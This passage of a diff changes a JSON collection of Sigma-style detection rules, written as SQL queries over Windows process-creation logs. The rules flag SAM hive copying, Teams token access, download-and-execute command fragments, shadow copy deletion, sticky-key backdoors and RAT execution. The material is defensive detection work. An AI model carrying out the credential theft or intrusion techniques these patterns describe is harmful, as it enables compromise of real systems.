'%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - 
"id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth 
(Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR 
CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE 
'\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": 
"6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT 
(ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", 
"status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR 
CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": 
"29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": 